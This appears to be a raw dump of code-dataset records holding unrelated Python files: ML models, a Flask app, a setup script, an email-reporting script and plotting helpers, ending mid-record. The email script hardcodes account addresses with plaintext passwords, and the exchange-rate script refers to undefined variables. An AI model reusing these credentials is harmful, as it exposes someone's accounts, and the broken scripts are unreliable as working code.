self.model.add(LSTM(256, return_sequences=False, stateful=False, dropout=0.5))\r\n self.model.add(BatchNormalization())\r\n self.model.add(Dense(output_dim))\r\n 
self.model.add(Activation('sigmoid'))\r\n #self.model.compile(optimizer=Adam(lr=lr), loss='mse')\r\n adam = optimizers.nadam(lr=0.01, beta_1=0.9, beta_2=0.999)\r\n self.model.compile(loss='mean_squared_error', optimizer=adam)\r\n #self.model.compile(optimizer=Adam(lr=lr,beta_1=0.9, beta_2=0.999, amsgrad=True), loss='mse')\r\n\r\n\r\n self.prob = None\r\n\r\n def reset(self):\r\n self.prob = None\r\n\r\n def predict(self, sample):\r\n self.prob = self.model.predict(np.array(sample).reshape((1, -1, self.input_dim)))[0]\r\n return self.prob\r\n\r\n def train_on_batch(self, x, y):\r\n return self.model.train_on_batch(x, y)\r\n\r\n def save_model(self, model_path):\r\n if model_path is not None and self.model is not None:\r\n self.model.save_weights(model_path, overwrite=True)\r\n\r\n def load_model(self, model_path):\r\n if model_path is not None:\r\n self.model.load_weights(model_path)\r\n\r\n\r\n\r\n# https://www.kaggle.com/qqgeogor/keras-lstm-attention-glove840b-lb-0-043\r\nclass Attention(Layer):\r\n def __init__(self, step_dim,\r\n W_regularizer=None, b_regularizer=None,\r\n W_constraint=None, b_constraint=None,\r\n bias=True, **kwargs):\r\n self.supports_masking = True\r\n self.init = initializers.get('glorot_uniform')\r\n\r\n self.W_regularizer = regularizers.get(W_regularizer)\r\n self.b_regularizer = regularizers.get(b_regularizer)\r\n\r\n self.W_constraint = constraints.get(W_constraint)\r\n self.b_constraint = constraints.get(b_constraint)\r\n\r\n self.bias = bias\r\n self.step_dim = step_dim\r\n self.features_dim = 0\r\n super(Attention, self).__init__(**kwargs)\r\n\r\n def build(self, input_shape):\r\n assert len(input_shape) == 3\r\n\r\n self.W = self.add_weight((input_shape[-1],),\r\n initializer=self.init,\r\n name='{}_W'.format(self.name),\r\n regularizer=self.W_regularizer,\r\n constraint=self.W_constraint)\r\n self.features_dim = input_shape[-1]\r\n\r\n if self.bias:\r\n self.b = self.add_weight((input_shape[1],),\r\n initializer='zero',\r\n name='{}_b'.format(self.name),\r\n regularizer=self.b_regularizer,\r\n constraint=self.b_constraint)\r\n else:\r\n self.b = None\r\n\r\n self.built = True\r\n\r\n def compute_mask(self, input, input_mask=None):\r\n return None\r\n\r\n def call(self, x, mask=None):\r\n features_dim = self.features_dim\r\n step_dim = self.step_dim\r\n\r\n eij = K.reshape(K.dot(K.reshape(x, (-1, features_dim)),\r\n K.reshape(self.W, (features_dim, 1))), (-1, step_dim))\r\n\r\n if self.bias:\r\n eij += self.b\r\n\r\n eij = K.tanh(eij)\r\n\r\n a = K.exp(eij)\r\n\r\n if mask is not None:\r\n a *= K.cast(mask, K.floatx())\r\n\r\n a /= K.cast(K.sum(a, axis=1, keepdims=True) + K.epsilon(), K.floatx())\r\n\r\n a = K.expand_dims(a)\r\n weighted_input = x * a\r\n return K.sum(weighted_input, axis=1)\r\n\r\n def compute_output_shape(self, input_shape):\r\n return input_shape[0], self.features_dim","sub_path":"policy_network.py","file_name":"policy_network.py","file_ext":"py","file_size_in_byte":6147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"16799930","text":"#!/usr/bin/python3\n\"\"\" Starts a Flask web application \"\"\"\nfrom flask import Flask, render_template\nfrom models import storage\nfrom models.state import State\n\n\napp = Flask(__name__)\n\n\n@app.teardown_appcontext\ndef teardown_session(exception):\n \"\"\" Removes the current SQLAlchemy Session \"\"\"\n storage.close()\n\n\n@app.route('/states_list', strict_slashes=False)\ndef display_html():\n \"\"\" Function called with /states_list route 
\"\"\"\n states = storage.all(State)\n dic_obj = {value.id: value.name for value in states.values()}\n return render_template('7-states_list.html', items=dic_obj)\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5000)\n","sub_path":"web_flask/7-states_list.py","file_name":"7-states_list.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"225988127","text":"from setuptools import setup, find_packages\nfrom codecs import open\nfrom os import path\n\n__version__ = '1.0.0'\n\n\nhere = path.abspath(path.dirname(__file__))\nwith open(path.join(here, 'requirements.txt'), encoding='utf-8') as f:\n all_reqs = f.read().split('\\n')\ninstall_requires = [x.strip() for x in all_reqs if 'git+' not in x]\ndependency_links = [x.strip().replace('git+', '') for x in all_reqs if x.startswith('git+')]\n\n\nsetup(\n name='download_pokemon',\n version=__version__,\n description=\"Python Script to download hundreds of pokemon from 'Google Images'. It is a ready-to-run code! \",\n url='https://github.com/joe-davidson1802/poke-detect',\n license='MIT',\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3.6',\n ],\n keywords='pokemon machine-learning ml neural-network image-search image-dataset image-scrapper image-gallery terminal command-line',\n packages=find_packages(exclude=['docs', 'tests*']),\n include_package_data=True,\n author='Joe Davidson',\n install_requires=install_requires,\n dependency_links=dependency_links,\n author_email='joe.davidson2111@hotmail.com',\n entry_points={\n 'console_scripts': [\n 'download_pokemon = download_pokemon:main'\n ]},\n\n)","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"555866062","text":"import numpy as np\nimport flag_mean #\nimport distances #\n\n'''\n-maybe dont use squared error for convergence criteria\n\n'''\n\n\ndef flag_median(X, eps, r, init = 'random', s_vals = False):\n #nate changed this\n\n if type(X) != list or len(X) == 0:\n return X\n \n medn = True \n # X a list of subspaces, r desired dimension\n m = len(X)\n\n #initialize median\n if init == 'random':\n #randomly\n n = X[0].shape[0]\n Y_raw = np.random.rand(n,r)\n Y0 = np.linalg.qr(Y_raw)[0]\n else:\n #flag mean\n Y0 = flag_mean.flag_mean(X,r)\n\n i=0\n alph = []\n aX = []\n err = []\n al = []\n for j in range(m):\n al.append((r-np.trace(np.dot(np.dot(Y0.transpose(),X[j]),np.dot(X[j].transpose(),Y0))))**(-1/4))\n aX.append(al[j]*X[j])\n alph.append(al)\n Y1 = flag_mean.flag_mean(aX,r)\n err.append(distances.chordal_distance(Y0,Y1,medn))\n i += 1\n err.append(1)\n\n while err[i-1] > eps:\n aX = []\n al = []\n for j in range(m):\n al.append((r-np.trace(np.dot(np.dot(Y1.transpose(),X[j]),np.dot(X[j].transpose(),Y1))))**(-1/4))\n aX.append(al[j]*X[j])\n alph.append(al)\n Y0 = Y1\n Y1 = flag_mean.flag_mean(aX,r)\n err.append(distances.chordal_distance(Y0,Y1,medn))\n cauch = err[i-1]-err[i]\n i += 1\n\n\n if cauch < 0:\n Y1 = Y0\n print('Last iteration of flag meadian increased error!')\n\n if s_vals:\n S = flag_mean.flag_mean(aX,r,s_vals)\n return S\n else:\n return 
Y1\n\n\n","sub_path":"python_code/flag_median.py","file_name":"flag_median.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"328875847","text":"import os\nos.chdir(\"../../\")\nimport import_folders\n\nimport datetime as dt\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport CTimeData as CTD\nimport copy as copy\nimport utilities_lib as ul\nfrom graph_lib import gl\nimport DDBB_lib as DBl\n\nimport Cemail\n\nplt.close(\"all\")\n\n######## SELECT SOURCE ########\ndataSource = \"GCI\" # Hanseatic FxPro GCI Yahoo\n[storage_folder, info_folder, \n updates_folder] = ul.get_foldersData(source = dataSource)\nfolder_images = \"../pics/gl/\"\n######## SELECT SYMBOLS AND PERIODS ########\nsymbols = [\"XAUUSD\",\"Mad.ITX\", \"EURUSD\"]\nsymbols = [\"Alcoa_Inc\"]\nsymbols = [\"Amazon\", \"Alcoa_Inc\"]\nperiods = [15]\n\n######## SELECT DATE LIMITS ###########\nsdate = dt.datetime.strptime(\"21-11-2016\", \"%d-%m-%Y\")\nedate = dt.datetime.strptime(\"25-11-2016\", \"%d-%m-%Y\")\n######## CREATE THE OBJECT AND LOAD THE DATA ##########\n# Tell which company and which period we want\ntimeData = CTD.CTimeData(symbols[0],periods[0])\nTD = DBl.load_TD_from_csv(storage_folder, symbols[1],periods[0])\ntimeData.set_csv(storage_folder) # Load the data into the model\ntimeData.set_TD(TD)\n############## Obtain time series ###########################\nprice = timeData.get_timeSeries([\"Close\", \"Average\"]);\n############# Plot time Series and save it to disk #########\ngl.plot([],price)\n\ndatafolder = \"../maildata/\"\n\npicdir = datafolder + \"pene.png\"\ngl.savefig(picdir)\n\n###########################################################################\n############## BASIC PLOTING FUNC #########################################\n###########################################################################\n\nuser = \"esopo.goldchick@gmail.com\"\npwd = \"Goldenegg\"\n\n#user = \"manuwhs@gmail.com\"\n#pwd = \"manumon7g.@\"\n\nrecipient = \"manuwhs@gmail.com\"\n#recipient = \"tsarmarianthi@gmail.com\"\n\nsubject = \"[Trapyng] Update %s\" % (\"penesd\")\n\nbody = \"Look at this super interesting stuff !!\"\n\nmyMail = Cemail.Cemail(user,pwd,recipient)\nmyMail.create_msgRoot(subject = subject)\n#myMail.set_subject(subject) # For some reason we can only initilize the Subject\nmyMail.add_HTML(body)\n\n## Add some HMTL\nfd = open(datafolder + \"index.html\")\ncaca = fd.read()\nfd.close\nmyMail.add_HTML(caca)\n\nmyMail.add_image(filedir = picdir, inline = 0)\nmyMail.add_image(filedir = picdir, inline = 1)\n\nmyMail.add_file(datafolder + \"Email_main.py\")\nmyMail.add_file(datafolder + \"main.pdf\")\n\nmyMail.add_HTML(\"

    Fuck you
    \")\nmyMail.add_HTML(\"Hello my friend\")\n########## YOU MAY HAVE TO ACTIVATE THE USED OF UNTRUSTFUL APPS IN GMAIL #####\nmyMail.send_email()\n","sub_path":"Examples/email/3. Email_main.py","file_name":"3. Email_main.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"557684703","text":"from django.core.management.base import BaseCommand, CommandError\nfrom base.models import Channels\n\nimport requests\n\nclass Command(BaseCommand):\n\tdef handle(self, *args, **options):\n\t\tr = requests.get('https://atlas.metabroadcast.com/3.0/channel_groups/cbg4.json?annotations=channels')\n\t\tchannel_groups = r.json()['channel_groups'][0]\n\t\tfor channel in channel_groups['channels']:\n\t\t\tChannels.objects.get_or_create(\n\t\t\t\ttitle=channel['channel']['title'],\n\t\t\t\tchannel_id=channel['channel']['id']\n\t\t\t)","sub_path":"base/management/commands/channels.py","file_name":"channels.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"266342326","text":"#Importing the libraries\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.svm import SVR\nfrom sklearn.model_selection import GridSearchCV, KFold\n\n#Getting the data and setting the index in date time format\n\ndataset = pd.read_csv(\"Classification GITHUB data.csv\")\ndataset['Date'] = pd.to_datetime(dataset['Date'])\ndataset = dataset.set_index('Date')\n\n\n#Creating the additional differential columns\n\ndata = dataset.iloc[1826:, 0:]\ndata['Interest Differential'] = data['Turkey Interest Rate'] - data['US Interest Rate']\ndata['Turkey Public Debt '] = data['Turkey Public Debt ']/1000\ndata['Turkey Public Debt'] = data['Turkey Public Debt ']\ndata['Growth Rate Differential'] = data['Turkey GDP Growth Rate'] - data['US GDP Growth Rate']\n\n\n#Picking out the relevant columns\n\nX = data.iloc[:, [5, 6, 10, 13, 14, 15]].values\ny = data.iloc[:, [0]].values\n\n\n#Function to average column values over given intervals\n\ndef chunk_it_up(array, n):\n \n size = np.shape(array)\n rows = size[0]\n columns = size[1]\n \n largest = int(rows/n)\n remainder = rows%n\n \n avg_matrix = np.zeros([largest, columns])\n \n for i in range(largest):\n for j in range(columns):\n avg_matrix[i][j] = np.mean(array[(i*n):(i*n+n), j])\n \n rem_matrix = []\n \n if remainder > 0:\n for j in range(columns):\n rem_matrix.append(np.mean(array[(largest*n):, j]))\n \n rem_matrix = np.reshape(rem_matrix, [1, len(rem_matrix)])\n \n avg_matrix = np.append(avg_matrix, rem_matrix, axis = 0)\n \n \n return avg_matrix\n\n\n#Taking the weekly averages\n\nX_5 = chunk_it_up(X, 5)\ny_5 = chunk_it_up(y, 5)\n\n\n#Standardising variables is important here for support vector regression\n\nstd = np.std(y_7)\nmean = np.mean(y_7)\n\nX_7_std = (X_7 - np.mean(X_7))/np.std(X_7)\ny_7_std = (y_7 - mean)/std\n\n\n#Roll it up one place\n\ny_7_std_2 = np.roll(y_7_std, -1)\ny_7_2 = np.roll(y_7, -1)\n\n\n#Splitting into the training and test sets for the weekly average analysis\n\nX_train_1 = X_7_std[0:-2, :]\nX_test_1 = X_7_std[-2:-1, :]\ny_train_1 = y_7_std_2[0:-2, :]\ny_test_1 = y_7_2[-2:-1, :]\n\n\nX_train_2 = X_7_std[0:-3, :]\nX_test_2 = X_7_std[-3:-1, :]\ny_train_2 = y_7_std_2[0:-3:, :]\ny_test_2 = y_7_2[-3:-1, :]\n\n\nX_train_4 = X_7_std[0:-5, :]\nX_test_4 = X_7_std[-5:-1, :]\ny_train_4 = y_7_std_2[0:-5:, :]\ny_test_4 = y_7_2[-5:-1, 
:]\n\n\nX_train_12 = X_7_std[0:-13, :]\nX_test_12 = X_7_std[-13:-1, :]\ny_train_12 = y_7_std_2[0:-13:, :]\ny_test_12 = y_7_2[-13:-1, :]\n\n\n\n#Defining some output functions\n\n#Function for calculating the MAPE\n\ndef get_my_mape(array_pred, array_real):\n mid_1 = []\n for i in range(len(array_pred)):\n mid_1.append((array_pred[i] - array_real[i])/array_real[i]*100)\n mid_1_abs = [np.abs(mid_1[i]) for i in range(len(mid_1))]\n output = sum(mid_1_abs)/len(mid_1)\n return output\n\n#Function for performing weekly average analysis\n\ndef lets_evaluate(classifier):\n classifier.fit(X_train_1, y_train_1)\n pred_for_1 = classifier.predict(X_test_1)\n pred_for_1_og = pred_for_1*std + mean\n mape_for_1 = get_my_mape(pred_for_1_og, y_test_1)\n \n classifier.fit(X_train_2, y_train_2)\n pred_for_2 = classifier.predict(X_test_2)\n pred_for_2_og = pred_for_2*std + mean\n mape_for_2 = get_my_mape(pred_for_2_og, y_test_2)\n \n classifier.fit(X_train_4, y_train_4)\n pred_for_4 = classifier.predict(X_test_4)\n pred_for_4_og = pred_for_4*std + mean\n mape_for_4 = get_my_mape(pred_for_4_og, y_test_4)\n \n classifier.fit(X_train_12, y_train_12)\n pred_for_12 = classifier.predict(X_test_12)\n pred_for_12_og = pred_for_12*std + mean\n mape_for_12 = get_my_mape(pred_for_12_og, y_test_12)\n \n \n output_dict = {\n 'MAPE for last 1 week prediction': mape_for_1,\n 'MAPE for last 2 week prediction': mape_for_2,\n 'MAPE for last 4 week prediction': mape_for_4,\n 'MAPE for last 12 week prediction': mape_for_12,\n }\n \n return output_dict\n\n\n\n#Testing out various regression models\n\nregressor_rbf = SVR(kernel = 'rbf', gamma = 'auto')\nmatrix_rbf = lets_evaluate(regressor_rbf)\n\nregressor_poly_2 = SVR(kernel = 'poly', degree = 2, gamma = 'auto')\nmatrix_poly_2 = lets_evaluate(regressor_poly_2)\n\nregressor_poly_3 = SVR(kernel = 'poly', degree = 3, gamma = 'auto')\nmatrix_poly_3= lets_evaluate(regressor_poly_3)\n\nregressor_linear = SVR(kernel = 'linear', gamma = 'auto')\nmatrix_linear = lets_evaluate(regressor_linear)\n\n\n#Grid searching for the best C value for the RBF kernel\n\nparam_grid = {\"C\": [0.1, 1, 3, 5, 10]}\n\nreg = GridSearchCV(estimator = regressor_rbf, param_grid = param_grid, cv=KFold(), scoring = 'neg_mean_squared_error')\n\ngrid_search_results = reg.fit(X_7_std[0:-1, :], y_7_std_2[0:-1, :])\n\ngrid_search_results.best_score_\ngrid_search_results.best_params_\n\n\n#Grid searching for the best epsilon value\n\nparam_grid_2 = {\n \"C\": [1],\n \"epsilon\": [0.01, 0.1, 1, 3, 5, 10]\n }\n\nreg_2 = GridSearchCV(estimator = regressor_rbf, param_grid = param_grid_2, cv=KFold(), scoring = 'neg_mean_squared_error')\n\ngrid_search_results_2 = reg_2.fit(X_7_std[0:-1, :], y_7_std_2[0:-1, :])\n\ngrid_search_results_2.best_score_\ngrid_search_results_2.best_params_\n\n\n#Evaluating the final regressor with the tuned hyperparameters\n\nfinal_regressor = SVR(kernel = 'rbf', gamma = 'auto', C = 1.0, epsilon = 0.01)\nfinal_regressor.fit(X_7_std, y_7_std_2)\nmatrix_final = lets_evaluate(final_regressor)\n\n\n#Defining them like this for convenience\n\ny_7_std_2 = y_7_std_2[0:-1, :]\nX_7_std = X_7_std[0:-1, :]\n\n\n#Performing K-Fold cross-validation to check for the most robust model\n\nscores_rbf = sum(cross_val_score(regressor_rbf, X_7_std, y_7_std_2, cv=83, scoring = 'neg_mean_squared_error'))/83\nscores_poly_2 = sum(cross_val_score(regressor_poly_2, X_7_std, y_7_std_2, cv=83, scoring = 'neg_mean_squared_error'))/83\nscores_poly_3 = sum(cross_val_score(regressor_poly_3, X_7_std, y_7_std_2, cv=83, scoring = 
'neg_mean_squared_error'))/83\nscores_linear = sum(cross_val_score(regressor_linear, X_7_std, y_7_std_2, cv=83, scoring = 'neg_mean_squared_error'))/83\nscores_final = sum(cross_val_score(final_regressor, X_7_std, y_7_std_2, cv=83, scoring = 'neg_mean_squared_error'))/83\n\n\n\n\n","sub_path":"Exchange Rate Prediction.py","file_name":"Exchange Rate Prediction.py","file_ext":"py","file_size_in_byte":6290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"540908539","text":"import tensorflow as tf\nfrom tensorflow.contrib.framework import arg_scope\n\nfrom layers import *\n\nclass Model(object):\n def __init__(self, config):\n self.task = config.task\n self.debug = config.debug\n self.reg_scale = config.reg_scale\n self.learning_rate = config.learning_rate\n\n self.layer_dict = {}\n\n input_dims = [\n None, config.input_height,\n config.input_width, config.input_channel,\n ]\n\n self.x = tf.placeholder(tf.uint8, [None, None, None, config.input_channel], 'x')\n self.x_history = tf.placeholder(tf.uint8, [None, None, None, config.input_channel], 'x_history')\n\n resize_dim = [config.input_height, config.input_width]\n self.resized_x = tf.image.resize_images(self.x, resize_dim)\n self.resized_x_history = tf.image.resize_images(self.x_history, resize_dim)\n\n self.normalized_x = normalize(self.resized_x)\n self.normalized_x_history = normalize(self.resized_x_history)\n\n self._build_model()\n self._build_steps()\n\n def build_optim(self):\n self.refiner_step = tf.Variable(0, name='refiner_step', trainable=False)\n self.discrim_step = tf.Variable(0, name='discrim_step', trainable=False)\n\n if self.task == \"generative\":\n optim = tf.train.GradientDescentOptimizer(self.learning_rate)\n self.refiner_optim = optim.minimize(\n self.refiner_loss,\n global_step=self.refiner_step,\n var_list=self.refiner_vars,\n )\n\n optim = tf.train.GradientDescentOptimizer(self.learning_rate)\n self.discrim_optim = optim.minimize(\n self.discrim_loss,\n global_step=self.discrim_step,\n var_list=self.discrim_vars,\n )\n elif self.task == \"estimate\":\n raise Exception(\"[!] 
Not implemented yet\")\n\n def _build_model(self):\n with arg_scope([resnet_block, conv2d, max_pool2d],\n layer_dict=self.layer_dict):\n self.R_x = self._build_refiner()\n self.denormalized_R_x = denormalize(self.R_x)\n\n self.D_x, self.D_x_logits = \\\n self._build_discrim(self.normalized_x, name=\"D_x\")\n self.D_R_x, self.D_R_x_logits = \\\n self._build_discrim(self.R_x, name=\"D_R_x\", reuse=True)\n self.D_x_history, self.D_x_history_logits = \\\n self._build_discrim(self.normalized_x_history, name=\"D_x_history\", reuse=True)\n\n #self.estimate_outputs = self._build_estimation_network()\n self._build_loss()\n\n def _build_loss(self):\n # Refiner loss\n zeros = tf.zeros_like(self.D_R_x)[:,:,:,0]\n ones = tf.ones_like(self.D_R_x)[:,:,:,0]\n\n fake_label = tf.stack([zeros, ones], axis=-1)\n real_label = tf.stack([ones, zeros], axis=-1)\n\n with tf.variable_scope(\"refiner\"):\n self.realism_loss = tf.reduce_sum(\n SE_loss(self.D_R_x_logits, real_label), [1, 2], name=\"realism_loss\")\n self.regularization_loss = 0\n # self.reg_scale * tf.reduce_sum(\n # self.R_x - self.normalized_x, [1, 2, 3],\n # name=\"regularization_loss\")\n\n self.refiner_loss = tf.reduce_mean(\n self.realism_loss, #+ self.regularization_loss,\n name=\"refiner_loss\")\n\n if self.debug:\n self.refiner_loss = tf.Print(self.refiner_loss, [self.R_x], \"R_x\")\n self.refiner_loss = tf.Print(self.refiner_loss, [self.D_R_x], \"D_R_x\")\n self.refiner_loss = tf.Print(self.refiner_loss, [self.normalized_x], \"normalized_x\")\n self.refiner_loss = tf.Print(self.refiner_loss, [self.regularization_loss], \"reg_loss\")\n\n self.refiner_summary = tf.summary.merge([\n tf.summary.image(\"input_images\", self.x),\n tf.summary.image(\"refined_images\", self.denormalized_R_x),\n tf.summary.scalar(\"realism_loss\", tf.reduce_mean(self.realism_loss)),\n tf.summary.scalar(\"regularization_loss\", tf.reduce_mean(self.regularization_loss)),\n tf.summary.scalar(\"loss\", tf.reduce_mean(self.refiner_loss)),\n ])\n\n # Discriminator loss\n with tf.variable_scope(\"discriminator\"):\n self.refiner_d_loss = tf.reduce_sum(\n SE_loss(self.D_R_x_logits, fake_label), [1, 2],\n name=\"refiner_d_loss\")\n self.refiner_history_d_loss = tf.reduce_sum(\n SE_loss(self.D_x_history_logits, fake_label), [1, 2],\n name=\"refiner_history_d_loss\")\n self.synthetic_d_loss = tf.reduce_sum(\n SE_loss(self.D_x_logits, real_label), [1, 2],\n name=\"synthetic_d_loss\")\n\n self.discrim_loss = tf.reduce_mean(\n self.refiner_d_loss + \\\n self.synthetic_d_loss, name=\"discrim_loss\")\n\n self.discrim_loss_with_history = tf.reduce_mean(\n self.refiner_d_loss + self.refiner_history_d_loss + \\\n self.synthetic_d_loss, name=\"discrim_loss_with_history\")\n\n self.discrim_summary = tf.summary.merge([\n tf.summary.scalar(\"refiner_d_loss\", self.refiner_d_loss),\n tf.summary.scalar(\"refiner_history_d_loss\", self.refiner_history_d_loss),\n tf.summary.scalar(\"synthetic_d_loss\", self.synthetic_d_loss),\n tf.summary.scalar(\"discrim_loss\", self.discrim_loss),\n tf.summary.scalar(\"discrim_loss_with_history\", self.discrim_loss_with_history),\n ])\n\n def _build_steps(self):\n def run(sess, inputs, fetch, input_op,\n summary_op, summary_writer, output_op=None):\n if summary_writer is not None:\n fetch['summary'] = summary_op\n if output_op is not None:\n fetch['output'] = output_op\n\n result = sess.run(fetch, feed_dict={ input_op: inputs })\n if result.has_key('summary'):\n summary_writer.add_summary(result['summary'], result['step'])\n summary_writer.flush()\n return 
result\n\n def train_refiner(sess, inputs, summary_writer=None, with_output=False):\n fetch = {\n 'loss': self.refiner_loss,\n 'optim': self.refiner_optim,\n 'step': self.refiner_step,\n }\n return run(sess, inputs, fetch, self.x,\n self.refiner_summary, summary_writer,\n output_op=self.R_x if with_output else None)\n\n def test_refiner(sess, inputs, summary_writer=None, with_output=False):\n fetch = {\n 'loss': self.refiner_loss,\n 'step': self.refiner_step,\n }\n return run(sess, inputs, fetch, self.x,\n self.refiner_summary, summary_writer,\n output_op=self.R_x if with_output else None)\n\n def train_discrim(sess, inputs, summary_writer=None):\n fetch = {\n 'loss': self.discrim_loss,\n 'optim': self.discrim_optim,\n 'step': self.discrim_step,\n }\n return run(sess, inputs, fetch, self.x,\n self.discrim_summary, summary_writer)\n\n def test_discrim(sess, inputs, summary_writer=None):\n fetch = {\n 'loss': self.discrim_loss,\n 'step': self.discrim_step,\n }\n return run(sess, inputs, fetch, self.x,\n self.discrim_summary, summary_writer=summary_writer)\n\n self.train_refiner = train_refiner\n self.test_refiner = test_refiner\n self.train_discrim = train_discrim\n self.test_discrim = test_discrim\n\n def _build_refiner(self):\n layer = self.normalized_x\n with tf.variable_scope(\"refiner\") as sc:\n layer = repeat(layer, 5, resnet_block, scope=\"resnet\")\n output = conv2d(layer, 1, 1, 1, scope=\"conv_1\")\n self.refiner_vars = tf.contrib.framework.get_variables(sc)\n return output \n\n def _build_discrim(self, layer, name, reuse=False):\n with tf.variable_scope(\"discriminator\") as sc:\n with arg_scope([conv2d], weights_initializer=tf.contrib.layers.xavier_initializer()):\n layer = conv2d(layer, 96, 3, 2, scope=\"conv_1\", name=name, reuse=reuse)\n layer = conv2d(layer, 64, 3, 2, scope=\"conv_2\", name=name, reuse=reuse)\n layer = max_pool2d(layer, 3, 1, scope=\"max_1\", name=name)\n layer = conv2d(layer, 32, 3, 1, scope=\"conv_3\", name=name, reuse=reuse)\n layer = conv2d(layer, 32, 1, 1, scope=\"conv_4\", name=name, reuse=reuse)\n logits = conv2d(layer, 2, 1, 1, scope=\"conv_5\", name=name, reuse=reuse)\n output = tf.nn.softmax(logits, name=\"softmax\")\n self.discrim_vars = tf.contrib.framework.get_variables(sc)\n return output, logits\n\n def _build_estimation_network(self):\n layer = self.normalized_x\n with tf.variable_scope(\"estimation\"):\n layer = conv2d(layer, 96, 3, 2, scope=\"conv_1\")\n layer = conv2d(layer, 64, 3, 2, scope=\"conv_2\")\n layer = max_pool2d(layer, 64, 3, scope=\"max_1\")\n layer = conv2d(layer, 32, 3, 1, scope=\"conv_3\")\n layer = conv2d(layer, 32, 1, 1, scope=\"conv_4\")\n layer = conv2d(layer, 2, 1, 1, activation_fn=slim.softmax)\n return layer\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"457736418","text":"#!/usr/local/bin/python2.7\n\nfrom argparse import ArgumentParser\nfrom multiprocessing import Pool\nfrom os import popen, system\nfrom os.path import basename, exists\nfrom sys import exit, stderr, stdout\nimport random\nfrom pprint import pprint\nimport operator\nimport math\n\ndef get_range( cluster_results_fn ):\n with open( cluster_results_fn, \"r\" ) as f:\n xmax = 0\n for l in f:\n if l.startswith(\"#\"): continue\n ls = l.split()\n res = int( ls[0] )\n if res > xmax:\n xmax = res\n return xmax+8\n\ndef plot( coverage_fn, common_core_fn, cluster_results_fn, tag='plot' ):\n\n xmax = get_range( 
cluster_results_fn )\n\n plt = open( \"%s.plt\" % tag, \"w\" )\n plt.write(\"set term post enhanced color 'Helvetica' 15 landscape\\n\")\n plt.write(\"set out '%s.eps'\\n\" % tag )\n plt.write(\"set title '%s'\\n\" % tag.replace(\"_\", \" \") )\n plt.write(\"set xtics 25\\n\")\n plt.write(\"set xlabel 'Residue'\\n\" )\n plt.write(\"set xrange [-2:%s]\\n\" % xmax )\n plt.write(\"set ylabel 'RMSD'\\n\")\n plt.write(\"set yrange [0:45]\\n\")\n plt.write(\"set style fill transparent solid 0.5 noborder\\n\")\n plt.write(\"set boxwidth 1.2 relative\\n\")\n plt.write(\"set tics nomirror out\\n\")\n plt.write(\"plot \\\\\\n\")\n plt.write(\"'%s' u 1:2 w boxes lc rgb '#add8e6' not, \\\\\\n\" % coverage_fn )\n plt.write(\"'%s' u 1:3 w p pt 7 ps 1.0 lc rgb '#ff80ff' not, \\\\\\n\" % common_core_fn )\n plt.write(\"'%s' u 1:3 w p ps 0.5 lw 1 lt 1 lc 0 pt 65 not\" % cluster_results_fn )\n plt.write(\"\\n\")\n plt.close()\n\n system(\"gnuplot %s.plt\" % tag )\n system(\"ps2pdf %s.eps\" % tag )\n \n\nif __name__==\"__main__\":\n parser = ArgumentParser()\n parser.add_argument(\"-t\", \"--tag\", default=\"pos_rmsd_plot\" )\n parser.add_argument(\"-c\", \"--coverage_fn\", default=\"residue_coverage.txt\" )\n parser.add_argument(\"-k\", \"--common_core_fn\", required=True, default=\"find_common_core_cal_distance_results.txt\" )\n parser.add_argument(\"-s\", \"--cluster_results_fn\", default=\"all_clustering_selected_b50_e050_r2.sc\" )\n \n args = parser.parse_args()\n \n assert exists( args.common_core_fn )\n assert exists( args.cluster_results_fn )\n\n #system(\"cal_lowrmsd_coverage.py -f %s -r 3 -p 1 -t 100 --plot -c --yaxis 50 > %s\" %( args.common_core_fn, args.coverage_fn ) )\n assert exists( args.coverage_fn )\n plot( args.coverage_fn, args.common_core_fn, args.cluster_results_fn, args.tag )\n\n","sub_path":"denovo_utils/plotting/make_pos_rmsd_plot.py","file_name":"make_pos_rmsd_plot.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"389968211","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Python version: 3.6\n\nimport torch\nfrom torch import nn, autograd\nfrom torch.utils.data import DataLoader, Dataset\nimport numpy as np\nfrom sklearn import metrics\n\n\nclass DatasetSplit(Dataset):\n def __init__(self, dataset, idxs):\n self.dataset = dataset\n self.idxs = list(idxs)\n\n def __len__(self):\n return len(self.idxs)\n\n def __getitem__(self, item):\n image, label = self.dataset[self.idxs[item]]\n return image, label\n\n\nclass LocalUpdate(object):\n def __init__(self, args, dataset, idxs, tb):\n self.args = args\n self.loss_func = nn.CrossEntropyLoss()\n self.ldr_train, self.ldr_val, self.ldr_test = self.train_val_test(dataset, list(idxs))\n self.tb = tb\n\n def train_val_test(self, dataset, idxs):\n # split train, validation, and test\n idxs_train = idxs[:420]\n idxs_val = idxs[420:480]\n idxs_test = idxs[480:]\n train = DataLoader(DatasetSplit(dataset, idxs_train), batch_size=self.args.local_bs, shuffle=True)\n val = DataLoader(DatasetSplit(dataset, idxs_val), batch_size=int(len(idxs_val)/10), shuffle=True)\n test = DataLoader(DatasetSplit(dataset, 